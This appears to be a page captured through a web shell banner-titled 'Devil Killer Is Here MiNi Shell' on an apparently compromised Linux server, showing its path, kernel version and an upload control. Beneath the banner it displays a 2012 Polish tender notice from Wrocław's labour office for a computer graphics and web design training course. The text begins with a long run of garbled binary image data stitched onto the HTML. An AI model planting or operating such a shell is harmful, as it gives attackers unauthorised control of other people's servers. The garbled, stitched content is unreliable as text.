JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120620/212280-N-2012.html

<p class="kh_header"><b>Wrocław: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia grupowego                w zakresie: Grafika komputerowa + 4-tygodniowa praktyka u pracodawcy                    (w pełnym wymiarze czasu pracy)</b><br>
<b>Numer ogłoszenia: 212280 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrocławiu , ul. Gliniana 20-22, 50-525 Wrocław, woj. dolnośląskie, tel. 71 7701 600, faks 71 7701 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> pup.wroclaw.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia grupowego                w zakresie: Grafika komputerowa + 4-tygodniowa praktyka u pracodawcy                    (w pełnym wymiarze czasu pracy).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia grupowego                w zakresie: Grafika komputerowa + 4-tygodniowa praktyka u pracodawcy                    (w pełnym wymiarze czasu pracy).

2. Liczba uczestników szkolenia: 14-16 osób w jednej grupie.  

3. Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy we Wrocławiu, z wykształceniem minimum średnim, podstawową umiejętnością obsługi komputera i pracy w środowisku MS Windows, które zostaną skierowane na kurs przez Zamawiającego po przeprowadzeniu naboru.

4. Liczba godzin szkolenia: Szkolenie musi obejmować zajęcia teoretyczne, praktyczne, egzamin i praktykę u pracodawcy. Łącznie 500 godzin/grupa, w tym 160 godzin praktyki                    u pracodawcy. Do czasu trwania szkolenia wlicza się czas przeznaczony na egzamin końcowy.

5. Źródło finansowania: Szkolenie będzie finansowane w całości ze środków publicznych (Fundusz Pracy).
6.  Termin wykonania zamówienia: od dnia podpisania umowy do 31.12.2012r.
Termin rozpoczęcia szkolenia: III kwartał 2012.

7. Miejsce wykonywania usługi szkoleniowej (zajęcia teoretyczne, zajęcia praktyczne, egzamin  i praktyka u pracodawców): Miasto Wrocław.

8. Cel szkolenia: Celem szkolenia jest przygotowanie uczestników szkolenia do pracy              w zawodzie grafika komputerowego i projektanta stron internetowych. Uczestnicy szkolenia powinni nabyć wiedzę z zakresu: zastosowania różnych rodzajów grafiki komputerowej                z wykorzystaniem powszechnie używanych programów graficznych, projektowania kompozycji graficznych wykorzystywanych w reklamie i wydawnictwach, projektowania, tworzenia i aktualizacji stron internetowych z zużyciem HTML oraz CSS, zakładania własnej działalności gospodarczej, a także praktycznego wykorzystania zdobytej wiedzy                             i umiejętności poprzez odbycie praktyki u pracodawcy.

9. Zakres szkolenia musi obejmować co najmniej następujące zagadnienia:
Moduł I: Grafika komputerowa - 180 godzin:
- posługiwanie się oprogramowaniem do tworzenia grafiki wektorowej z zastosowaniem odpowiedniego programu np. program CorelDRAW, Adobe Illustrator lub równoważny,
- posługiwanie się oprogramowaniem do tworzenia grafiki rastrowej z zastosowaniem odpowiedniego programu np. program Adobe Photoshop, Corel PHOTO-PAINT lub równoważny, 
- zasady sporządzania  wydruków czarno-białych i wyciągów barwnych w czterech podstawowych kolorach lub kolorach specjalnych,
- przygotowanie projektowanych materiałów do druku z wykorzystaniem odpowiedniego programu np. Adobe InDesign lub równoważny,
- projektowanie prezentacji graficznych i multimedialnych wykorzystywanych w reklamie               i wydawnictwach;
Moduł II: Projektowanie stron internetowych - 120 godzin:
- wykonywanie grafiki na potrzeby tworzenia witryny internetowej,
- opracowanie strony internetowej za pomocą języka HTML,
- wykorzystanie do tworzenia stron internetowych stylów kaskadowych CSS;
Moduł III: Podstawy przedsiębiorczości - 40 godzin:
- regulacje prawne związane z prowadzeniem małego biznesu,
- biznes plan własnego przedsięwzięcia, 
- procedura rejestracji firmy,
- podstawy marketingu i reklamy,
- pozyskiwanie środków na rozwój firmy,
- prawa autorskie, etyka zawodu;
Moduł IV: Praktyka u pracodawcy zgodnie z kierunkiem szkolenia - 160 godzin.

Program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych dla zawodu grafika komputerowego i projektanta stron internetowych, dostępne w bazach danych prowadzonych przez Ministerstwo Pracy i Polityki Społecznej znajdujących się na stronie internetowej: www.standardyiszkolenia.praca.gov.pl.

10. Organizacja szkolenia:
10.1 Szkolenie należy zrealizować według planu nauczania obejmującego 40 godzin zegarowych w tygodniu. Jedną godzinę Zamawiający rozumie jako 60 minut (zajęcia edukacyjne liczące 45 minut oraz przerwa licząca 15 minut, przy czym długość przerw może być ustalona w sposób elastyczny), praktyka u pracodawcy musi odbywać się w pełnym wymiarze czasu pracy tj. po 8 godzin zegarowych dziennie;
10.2 Zajęcia muszą się odbywać w godz. między 08.00 - 17.00 od poniedziałku do piątku            (z wyłączeniem niedziel, świąt oraz dni ustawowo wolnych od pracy), w kolejno następujących po sobie dniach, liczba godzin dziennie nie może przekroczyć 8.                         W wyjątkowych sytuacjach dopuszczalne jest przeprowadzenie zajęć w soboty;
10.3 Wykonawca przygotuje program szkolenia. Egzamin końcowy musi być integralną częścią programu oraz wchodzić w skład ilości godzin przewidzianych programem. Liczba godzin zajęć praktycznych nie może być niższa niż 240 godzin. Egzamin końcowy musi być ujęty w Programie szkolenia w pozycji Plan nauczania z uwzględnieniem ilości godzin przewidzianych na ten egzamin oraz w harmonogramie szkolenia z uwzględnieniem daty tego egzaminu i ilości godzin przewidzianych na egzamin;
10.4 Szkolenie powinno mieć opiekuna z ramienia Wykonawcy, czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym;
10.5 Wszystkie zajęcia muszą być przeprowadzone osobiście przez kadrę dydaktyczną wskazaną w ofercie. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą                e-learningu, w formie eksternistycznej itp.;
10.6 Zajęcia muszą odbywać się w pracowni komputerowej wyposażonej w 16 komputerów. Pracownia musi być przestronna, jasno oświetlona, dostosowana do liczby uczestników szkolenia, spełniać warunki zgodne z przepisami dotyczącymi bezpieczeństwa	i higieny pracy oraz ochrony przeciwpożarowej, zawierać osobne miejsca do siedzenia dla każdego uczestnika szkolenia umożliwiające swobodne sporządzanie notatek (stolik, ławka bądź krzesło z przystawką) oraz muszą być wyposażone w sprzęt techniczny niezbędny do sprawnego prowadzenia zajęć (tj. tablica, rzutnik, flipchart, drukarka, serwer itp.). W każdej pracowni komputerowej zapewniony musi być swobodny dostęp uczestników do sprzętu komputerowego wyposażonego w licencjonowane oprogramowanie niezbędne do prawidłowego przeprowadzenia szkolenia, tj. system operacyjny co najmniej Windows XP,                   lub Mac OS X, minimum 2 programy graficzne (np. z pakietu Adobe, Corel lub równoważnego). Na jednego uczestnika szkolenia musi przypadać jedno stanowisko komputerowe, posiadające napęd CD-RW i stały dostęp do Internetu. Zapewniony musi być również dostęp do pomieszczeń sanitarnych w budynku, w którym odbywają się zajęcia               (w tym dostęp do WC zaopatrzonego w środki higieny) oraz do zaplecza socjalnego.
W przypadku, gdy Wykonawca nie jest dysponentem potencjału technicznego musi załączyć dokument potwierdzający, że będzie dysponował lokalem lub sprzętem innego podmiotu na czas realizacji zamówienia;
10.7 Wykonawca ma obowiązek ubezpieczyć od następstw nieszczęśliwych wypadków, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, uczestników szkolenia wskazanych przez Zamawiającego;
10.8 Na pierwszych zajęciach Wykonawca przedstawi każdemu uczestnikowi szkolenia program szkolenia i harmonogram realizowanych zajęć zawierający również miejsca odbywania praktyki u pracodawców;
10.9 Każdy uczestnik szkolenia  otrzyma od Wykonawcy na własność minimum jeden podręcznik z zakresu obejmującego treści szkolenia (nie może być kserowany), inne materiały szkoleniowe i dydaktyczne, artykuły piśmiennicze w postaci zeszytu, długopisu, zakreślacza. Dodatkowe materiały (np. skrypty, materiały ksero dotyczące przedmiotu zamówienia, które muszą być czytelne, estetycznie wykonane i dobrej jakości) mogą być przekazywane w trakcie zajęć, zgodnie z ich tematyką; 
10.10 Wykonawca zobowiązany jest do prowadzenia dokumentacji szkolenia obejmującej: dziennik zajęć edukacyjnych, indywidualne listy obecności uczestników szkolenia, protokoły  z egzaminów, karty ocen z okresowych sprawdzianów efektów kształcenia, rejestry wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia                 i uzyskanie kwalifikacji oraz do	sprawowania nadzoru nad frekwencją uczestników szkolenia;
10.11 Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie systematycznej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób mających trudności w procesie nauczania;
10.12 W trakcie szkolenia (najpóźniej w połowie) oraz po jego zakończeniu Wykonawca przeprowadzi wśród wszystkich uczestników ocenę szkolenia za pomocą formularza anonimowej ankiety oceniającej dostarczonej przez Zamawiającego w dniu podpisania umowy;
10.13 Szkolenie powinno zakończyć się egzaminem a nabyte umiejętności powinny być potwierdzone wydaniem zaświadczenia o ukończeniu szkolenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji zawierającego, o ile przepisy odrębne nie stanowią inaczej, zgodnie z wymaganiami określonymi w § 75 ust. 3 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.): numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia,                             a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania	zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie. Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia Wykonawca dołącza do oferty;
10.14 Wykonawca zapewnia miejsca praktyk u pracodawcy dla wszystkich uczestników szkolenia w ramach realizowanego zamówienia (4 tygodnie praktyki). Wykonawca musi wskazać nazwy i adresy pracodawców, u których będą realizowane praktyki oraz opiekunów uczestników praktyk u 	danego pracodawcy. Wykaz miejsc praktyk oraz oświadczenia pracodawców (w oryginale) o zobowiązaniu przyjęcia na praktykę Wykonawca załącza do oferty. 	Poprzez określenie praktyka u pracodawcy Zamawiający rozumie odbycie                      u wskazanych przez Wykonawcę pracodawców praktyki polegającej na możliwości zastosowania w praktyce wiedzy i umiejętności zdobytych przez uczestników szkolenia podczas zajęć teoretycznych i praktycznych. Wykonawca winien wskazać w ofercie co najmniej ośmiu pracodawców, u których realizowana będzie praktyka. 
Uwaga: Wykonawca musi wykazać tylko takich pracodawców, którzy zapewnią każdemu przyjętemu na praktykę uczestnikowi szkolenia odpowiednie stanowisko pracy tj. komputer  z takimi samymi licencjonowanymi programami graficznymi, jakie będą wykorzystywane przez Wykonawcę do realizacji części teoretyczno-praktycznej szkolenia. 
10.15 Przedmiot zamówienia nie obejmuje świadczenia przez Wykonawcę usług cateringowych na rzecz uczestniczących w szkoleniu osób bezrobotnych skierowanych przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd	pracy właściwy dla siedziby instytucji szkoleniowej, zgodnie z ustawą z dnia 20 kwietnia 2004r.                 	o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69, poz. 415 z późn.	zm.) oraz rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r.                   	w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236, poz. 2365 z późn. zm.); warunek	ten zostanie spełniony, jeżeli instytucja szkoleniowa złoży wraz z ofertą stosowne oświadczenie 	o posiadaniu aktualnego na rok 2012 wpisu do Rejestru Instytucji Szkoleniowych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat	przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 	w tym okresie, przeprowadził z należytą starannością co najmniej 1 szkolenie grupowe dla	minimum 12 osób o tematyce odpowiadającej przedmiotowi zamówienia tj. z zakresu grafiki	komputerowej z projektowaniem stron internetowych, w wymiarze nie krótszym niż 160	godzin 	szkolenia, z podaniem jego wartości, przedmiotu, daty wykonania i odbiorcy.                    	W przypadku, gdy Wykonawca nie przeprowadził szkolenia w zakresie grafiki komputerowej             	z projektowaniem stron internetowych (wyłączając praktykę u pracodawcy) Zamawiający	dopuszcza możliwość wykazania przeprowadzenia co najmniej 2 szkoleń grupowych dla	łącznie minimum 24 osób o tematyce odpowiadającej przedmiotowi zamówienia, tj. co	najmniej jedno	szkolenie grupowe z zakresu grafiki komputerowej w wymiarze nie krótszym	niż 80 godzin i co najmniej jedno szkolenie grupowe z zakresu projektowania stron	internetowych w wymiarze nie krótszym niż 80 godzin, z podaniem ich wartości,	przedmiotu, dat wykonania i odbiorców. Zamawiający przez grupę szkolenia rozumie minimum 	12 osób szkolących się w tym samym miejscu i w tym samym czasie tj. na tych samych	zajęciach. Wykonawca musi udokumentować, że wymienione w wykazie zrealizowanych	szkoleń, stanowiącym załącznik nr 4 do SIWZ usługa/i zostały należycie wykonane załączając	dokumenty odbiorców	wskazanych w w/w wykazie, potwierdzające, że każde ze	zrealizowanych szkoleń zostało	wykonane należycie (np. referencje, podziękowania, pochwały	itp.). Wykonawca jest	zobowiązany dołączyć do wykazu wykonanych usług - dokumenty lub	informację - przedstawiające zakres tematyczny zrealizowanych szkoleń, jeżeli nie wynika to                	z nazwy poszczególnego szkolenia, wskazanego w wykazie lub z dołączonych dokumentów,	potwierdzających należyte wykonanie usługi;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia	będzie dysponował co najmniej 1 pracownią komputerową wyposażoną w 16 komputerów.	Pracownia musi być przestronna, jasno oświetlona, dostosowana do liczby uczestników	szkolenia, spełniać warunki zgodne z przepisami dotyczącymi bezpieczeństwa i higieny pracy	oraz ochrony przeciwpożarowej, zawierać osobne miejsca do siedzenia dla każdego uczestnika	szkolenia umożliwiające swobodne sporządzanie notatek (stolik, ławka bądź krzesło                        	z przystawką) oraz muszą być wyposażone w sprzęt techniczny niezbędny do sprawnego	prowadzenia zajęć (tj.	tablica, rzutnik, flipchart, drukarka, serwer itp.). W każdej pracowni	komputerowej zapewniony musi być swobodny dostęp uczestników do sprzętu komputerowego 	wyposażonego w licencjonowane oprogramowanie niezbędne do prawidłowego	przeprowadzenia szkolenia, tj. system	operacyjny co najmniej Windows XP lub Mac OS X,	minimum 2 programy graficzne (np. z pakietu Adobe, Corel lub równoważnego). Na jednego	uczestnika szkolenia musi przypadać jedno stanowisko komputerowe, posiadające napęd CD-	RW i stały dostęp do Internetu. Zapewniony musi być również dostęp do pomieszczeń	sanitarnych w budynku, w którym odbywają się zajęcia (w tym dostęp do WC zaopatrzonego     	w środki higieny) oraz do zaplecza socjalnego. W przypadku, gdy Wykonawca nie jest	dysponentem potencjału technicznego musi załączyć dokument potwierdzający, że będzie	dysponował lokalem lub sprzętem innego podmiotu na czas realizacji zamówienia. W ramach	zamówienia Wykonawca musi zapewnić miejsca praktyk u pracodawców dla wszystkich	uczestników szkolenia tj. dla 16 osób. Wykonawca winien wskazać w ofercie co najmniej	ośmiu pracodawców, u których realizowana będzie praktyka. W oświadczeniu stanowiącym	załącznik nr 11 do SIWZ Wykonawca musi wskazać nazwy i adresy pracodawców, u których	będą realizowane praktyki oraz opiekunów uczestników praktyk z ramienia pracodawcy. 	Wykonawca musi wykazać tylko takich pracodawców, którzy zapewnią każdemu przyjętemu na 	praktykę uczestnikowi szkolenia odpowiednie stanowisko pracy tj. komputer z takimi samymi	licencjonowanymi programami graficznymi, jakie będą wykorzystywane przez Wykonawcę do	realizacji części teoretyczno-praktycznej szkolenia. Wraz z w/w wykazem miejsc praktyk	do oferty muszą być załączone oryginały oświadczeń	pracodawców zobowiązujących się do	przyjęcia na praktykę uczestników szkolenia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia	będzie dysponował kadrą dydaktyczną składającą się z:
a) co najmniej dwóch osób do prowadzenia zajęć z modułu I i modułu II, z których każda osoba musi posiadać wykształcenie wyższe związane z zakresem prowadzonych zajęć                 i doświadczenie związane z realizacją co najmniej 1 szkolenia grupowego dla minimum 12 osób o zakresie tematycznym odpowiadającym zakresowi prowadzonych zajęć lub posiadać inne wykształcenie wyższe nie związane z kierunkiem prowadzonych zajęć                    i doświadczenie w realizacji co najmniej 2 szkoleń grupowych dla łącznie 24 osób                      o zakresie tematycznym odpowiadającym zakresowi prowadzonych zajęć. W przypadku nauczycieli za doświadczenie uznaje się posiadanie rocznego stażu pracy dydaktycznej związanej z zakresem prowadzonych zajęć,
b) co najmniej jednej osoby prowadzącej zajęcia z modułu III, która musi posiadać wykształcenie wyższe związane z zakresem prowadzonych zajęć i doświadczenie związane       z realizacją co najmniej 1 szkolenia grupowego dla minimum 12 osób o zakresie tematycznym odpowiadającym zakresowi prowadzonych zajęć lub posiadać inne wykształcenie wyższe nie związane z kierunkiem prowadzonych zajęć i doświadczenie                    w realizacji co najmniej 2 szkoleń grupowych dla łącznie 24 osób o zakresie tematycznym odpowiadającym zakresowi prowadzonych zajęć. W przypadku nauczycieli za doświadczenie uznaje się posiadanie rocznego stażu pracy dydaktycznej związanej                      z zakresem prowadzonych zajęć,
c) opiekunów uczestników praktyk realizowanych u pracodawców;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

